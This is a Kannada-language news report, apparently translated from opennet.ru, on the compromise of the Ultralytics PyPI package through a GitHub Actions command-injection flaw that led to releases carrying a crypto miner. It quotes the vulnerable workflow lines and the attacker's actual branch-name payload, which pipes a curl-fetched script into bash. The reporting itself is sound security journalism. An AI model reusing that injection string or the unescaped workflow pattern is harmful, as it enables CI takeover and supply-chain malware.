ವಸ್ತು ಪತ್ತೆ ಮತ್ತು ಚಿತ್ರ ವಿಭಜನೆಯಂತಹ ಕಂಪ್ಯೂಟರ್ ದೃಷ್ಟಿ ಸಮಸ್ಯೆಗಳನ್ನು ಪರಿಹರಿಸಲು ಬಳಸಲಾಗುವ ಅಲ್ಟ್ರಾಲಿಟಿಕ್ಸ್ ಪೈಥಾನ್ ಲೈಬ್ರರಿಯ ರೆಪೊಸಿಟರಿಯಲ್ಲಿ ದಾಳಿಕೋರರು ಗಿಟ್ಹಬ್ ಆಕ್ಷನ್ಸ್ ಹ್ಯಾಂಡ್ಲರ್ನೊಂದಿಗೆ ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಸಾಧ್ಯವಾಯಿತು. ರೆಪೊಸಿಟರಿಯನ್ನು ಪ್ರವೇಶಿಸಿದ ನಂತರ, ದಾಳಿಕೋರರು PyPI ಡೈರೆಕ್ಟರಿಗೆ ಹಲವಾರು ಹೊಸ ಅಲ್ಟ್ರಾಲಿಟಿಕ್ಸ್ ಬಿಡುಗಡೆಗಳನ್ನು ಪ್ರಕಟಿಸಿದರು, ಇದರಲ್ಲಿ ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ ಗಣಿಗಾರಿಕೆಗಾಗಿ ದುರುದ್ದೇಶಪೂರಿತ ಬದಲಾವಣೆಗಳು ಸೇರಿವೆ. ಕಳೆದ ತಿಂಗಳಿನಲ್ಲಿ, ಅಲ್ಟ್ರಾಲಿಟಿಕ್ಸ್ ಲೈಬ್ರರಿಯನ್ನು PyPI ಡೈರೆಕ್ಟರಿಯಿಂದ 6.4 ಮಿಲಿಯನ್ಗಿಂತಲೂ ಹೆಚ್ಚು ಬಾರಿ ಡೌನ್ಲೋಡ್ ಮಾಡಲಾಗಿದೆ.
ರೆಪೊಸಿಟರಿಯನ್ನು ರಾಜಿ ಮಾಡಲು, ಅಲ್ಟ್ರಾಲಿಟಿಕ್ಸ್-ಆಕ್ಷನ್ಸ್ ಪ್ಯಾಕೇಜ್ನಲ್ಲಿ ದುರ್ಬಲತೆಯನ್ನು ಬಳಸಲಾಯಿತು, ಇದನ್ನು ಗಿಟ್ಹಬ್ನಲ್ಲಿನ ರೆಪೊಸಿಟರಿಯೊಂದಿಗೆ ಕೆಲವು ಕ್ರಿಯೆಗಳನ್ನು ನಿರ್ವಹಿಸಿದಾಗ, ಗಿಟ್ಹಬ್ ಕ್ರಿಯೆಗಳ ಕಾರ್ಯವಿಧಾನವನ್ನು ಬಳಸಿಕೊಂಡು ಹ್ಯಾಂಡ್ಲರ್ಗಳನ್ನು ಸ್ವಯಂಚಾಲಿತವಾಗಿ ಪ್ರಾರಂಭಿಸಲು ಬಳಸಲಾಗುತ್ತದೆ. ಅಲ್ಟ್ರಾಲಿಟಿಕ್ಸ್ ಯೋಜನೆಯಲ್ಲಿ, ದುರ್ಬಲ ಹ್ಯಾಂಡ್ಲರ್ ಅನ್ನು ಪುಲ್_ರೆಕ್ವೆಸ್ಟ್_ಟಾರ್ಗೆಟ್ ಈವೆಂಟ್ಗೆ ಬಂಧಿಸಲಾಗಿತ್ತು ಮತ್ತು ಹೊಸ ಪುಲ್ ವಿನಂತಿಗಳನ್ನು ಸ್ವೀಕರಿಸಿದಾಗ ಕರೆಯಲಾಯಿತು. ನಿರ್ದಿಷ್ಟವಾಗಿ ಹೇಳುವುದಾದರೆ, ಕಳುಹಿಸಲಾದ ಪುಲ್ ವಿನಂತಿಗಳಲ್ಲಿ ಕೋಡ್ ಅನ್ನು ಫಾರ್ಮ್ಯಾಟ್ ಮಾಡಲು, ಫಾರ್ಮ್ಯಾಟ್.yml ಹ್ಯಾಂಡ್ಲರ್ ಅನ್ನು ಕರೆಯಲಾಯಿತು ಮತ್ತು action.yml ಫೈಲ್ನ "ರನ್" ವಿಭಾಗದಲ್ಲಿ ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲಾಯಿತು, ಇದು ಬದಲಿ ಮಾದರಿಗಳೊಂದಿಗೆ ಶೆಲ್ ಆಜ್ಞೆಗಳನ್ನು ಒಳಗೊಂಡಿದೆ: git ಪುಲ್ ಆರಿಜಿನ್ ${{ github.head_ref || github.ref }} git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}"
ಹೀಗಾಗಿ, ಪುಲ್ ವಿನಂತಿಯಲ್ಲಿ ಉಲ್ಲೇಖಿಸಲಾದ Git ಶಾಖೆಯ ಹೆಸರನ್ನು ಸರಿಯಾದ ಎಸ್ಕೇಪಿಂಗ್ ಇಲ್ಲದೆ ಶೆಲ್ ಆಜ್ಞೆಗಳಲ್ಲಿ ಬದಲಿಸಲಾಗಿದೆ. ಆಗಸ್ಟ್ನಲ್ಲಿ, ಪ್ರತಿಧ್ವನಿ ಕಾರ್ಯದಲ್ಲಿ ಬಾಹ್ಯ ಮೌಲ್ಯದ ಬಳಕೆಗೆ ಸಂಬಂಧಿಸಿದ ಇದೇ ರೀತಿಯ ದುರ್ಬಲತೆಯನ್ನು ಅಲ್ಟ್ರಾಲಿಟಿಕ್ಸ್-ಆಕ್ಷನ್ಸ್ ಪ್ಯಾಕೇಜ್ನಲ್ಲಿ ಈಗಾಗಲೇ ಸರಿಪಡಿಸಲಾಗಿದೆ ಎಂಬುದು ಗಮನಾರ್ಹ: echo "github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}"
GitHub Actions ಹ್ಯಾಂಡ್ಲರ್ನ ಸಂದರ್ಭದಲ್ಲಿ ತಮ್ಮ ಕೋಡ್ನ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯನ್ನು ಸಂಘಟಿಸಲು, ದಾಳಿಕೋರರು ಅಲ್ಟ್ರಾಲಿಟಿಕ್ಸ್ ರೆಪೊಸಿಟರಿಗೆ ಪುಲ್ ವಿನಂತಿಯನ್ನು ಕಳುಹಿಸಿದರು, ಶಾಖೆಯ ಹೆಸರನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಿದರು: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
ಅದರಂತೆ, ಪುಲ್ ವಿನಂತಿಯನ್ನು ಸ್ವೀಕರಿಸಿದಾಗ, ದಾಳಿಕೋರರು ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ “$(…)” ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ಕೋಡ್ಗೆ ಸೇರಿಸಲಾಯಿತು, ಇದು ಹ್ಯಾಂಡ್ಲರ್ನ ನಂತರದ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯ ನಂತರ, “curl -sSfL raw.githubusercontent.com/…/file.sh | bash” ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಕಾರಣವಾಯಿತು.
GitHub Actions ನ ಸಂದರ್ಭದಲ್ಲಿ ರನ್ನಿಂಗ್ ಕೋಡ್ ಅನ್ನು ರೆಪೊಸಿಟರಿ ಆಕ್ಸೆಸ್ ಟೋಕನ್ ಮತ್ತು ಇತರ ಸೂಕ್ಷ್ಮ ಡೇಟಾವನ್ನು ಸೆರೆಹಿಡಿಯಲು ಬಳಸಬಹುದು. ದಾಳಿಕೋರರು ಬಿಡುಗಡೆಯನ್ನು ಹೇಗೆ ರಚಿಸುವಲ್ಲಿ ಯಶಸ್ವಿಯಾದರು, GitHub Actions ನಲ್ಲಿ ತಮ್ಮ ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವ ಸಾಮರ್ಥ್ಯವನ್ನು ಪಡೆದರು ಎಂಬುದು ಇನ್ನೂ ಸ್ಪಷ್ಟವಾಗಿಲ್ಲ, ಆದರೆ publish.yml ಹ್ಯಾಂಡ್ಲರ್ನಲ್ಲಿನ ಬದಲಾವಣೆಯಿಂದಾಗಿ (ದಾಳಿಕೋರರು PyPI ಗೆ ಬಿಡುಗಡೆಗಳನ್ನು ಪ್ರಕಟಿಸಲು ಅನುಮತಿಸಲಾದ ಖಾತೆಗಾಗಿ ಚೆಕ್ ಅನ್ನು ತೆಗೆದುಹಾಕಿದ್ದಾರೆ) ಮತ್ತು GitHub Actions ಬಿಲ್ಡ್ ಕ್ಯಾಶ್ ಪಾಯಿಸನಿಂಗ್ ತಂತ್ರವನ್ನು ಬಳಸಿಕೊಂಡು ತಮ್ಮ ಡೇಟಾವನ್ನು ಬಿಡುಗಡೆಯಲ್ಲಿ ಬದಲಿಸುವುದರಿಂದ ಇದು ಸಾಧ್ಯವಾಯಿತು ಎಂದು ಊಹಿಸಲಾಗಿದೆ.
ಅಲ್ಟ್ರಾಲಿಟಿಕ್ಸ್ 8.3.41 ರ ಮೊದಲ ದುರುದ್ದೇಶಪೂರಿತ ಬಿಡುಗಡೆಯನ್ನು ಡಿಸೆಂಬರ್ 4 ರಂದು ರಾತ್ರಿ 23:51 ಕ್ಕೆ (MSK) PyPI ನಲ್ಲಿ ದಾಳಿಕೋರರು ಪ್ರಕಟಿಸಿದರು ಮತ್ತು ಮರುದಿನ ಮಧ್ಯಾಹ್ನ 12:15 ಕ್ಕೆ ತೆಗೆದುಹಾಕಲಾಯಿತು. ಮಧ್ಯಾಹ್ನ 15:47 ಕ್ಕೆ, ಮತ್ತೊಂದು ಬಿಡುಗಡೆಯಾದ 8.3.42 ಅನ್ನು ಪೋಸ್ಟ್ ಮಾಡಲಾಯಿತು ಮತ್ತು 16:47 ಕ್ಕೆ ತೆಗೆದುಹಾಕಲಾಯಿತು. ಹೀಗಾಗಿ, ದುರುದ್ದೇಶಪೂರಿತ ಆವೃತ್ತಿಗಳು ಒಟ್ಟು ಸುಮಾರು 13 ಗಂಟೆಗಳ ಕಾಲ ಡೌನ್ಲೋಡ್ಗೆ ಲಭ್ಯವಿದ್ದವು (PyPI ದಿನಕ್ಕೆ ಸುಮಾರು 250 ಅಲ್ಟ್ರಾಲಿಟಿಕ್ಸ್ ಲೈಬ್ರರಿ ಡೌನ್ಲೋಡ್ಗಳನ್ನು ದಾಖಲಿಸುತ್ತದೆ). 8.3.41 ಮತ್ತು 8.3.42 ಬಿಡುಗಡೆಗಳು ಬಾಹ್ಯದಿಂದ ಡೌನ್ಲೋಡ್ ಮಾಡಿದ ಕೋಡ್ ಅನ್ನು ಒಳಗೊಂಡಿವೆ. ಸರ್ವರ್ ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ ಗಣಿಗಾರಿಕೆಗಾಗಿ XMRig ಘಟಕ.
ಯೋಜನಾ ಅಭಿವರ್ಧಕರು ಸಮಸ್ಯೆಯನ್ನು ಸರಿಪಡಿಸಿ 8.3.43 ಮತ್ತು 8.3.44 ರ ತಿದ್ದುಪಡಿ ಬಿಡುಗಡೆಗಳನ್ನು ರಚಿಸಿದರು, ಆದರೆ ಎರಡು ದಿನಗಳ ನಂತರ ಮತ್ತೊಂದು ದಾಳಿ ನಡೆಸಲಾಯಿತು, ಈ ಸಮಯದಲ್ಲಿ ದಾಳಿಕೋರರು ಇಂದು 04:41 ಮತ್ತು 05:27 (MSK) - 8.3.45 ಮತ್ತು 8.3.46 ಕ್ಕೆ ಎರಡು ಹೆಚ್ಚುವರಿ ದುರುದ್ದೇಶಪೂರಿತ ಬಿಡುಗಡೆಗಳನ್ನು ಪ್ರಕಟಿಸಿದರು, ಇದರಲ್ಲಿ ವಿಭಿನ್ನ ಗಣಿಗಾರಿಕೆ ಕೋಡ್ ಸೇರಿದೆ. ತನಿಖೆ ಪೂರ್ಣಗೊಳ್ಳುವವರೆಗೆ, ಬಳಕೆದಾರರು ಹೊಸ ಆವೃತ್ತಿಗಳನ್ನು ಸ್ಥಾಪಿಸುವುದನ್ನು ತಡೆಹಿಡಿಯಲು ಮತ್ತು ಅವಲಂಬನೆಗಳಲ್ಲಿ ಬಿಡುಗಡೆ 8.3.44 ಅನ್ನು ಸರಿಪಡಿಸಲು ಸೂಚಿಸಲಾಗಿದೆ.
ಮೂಲ: opennet.ru
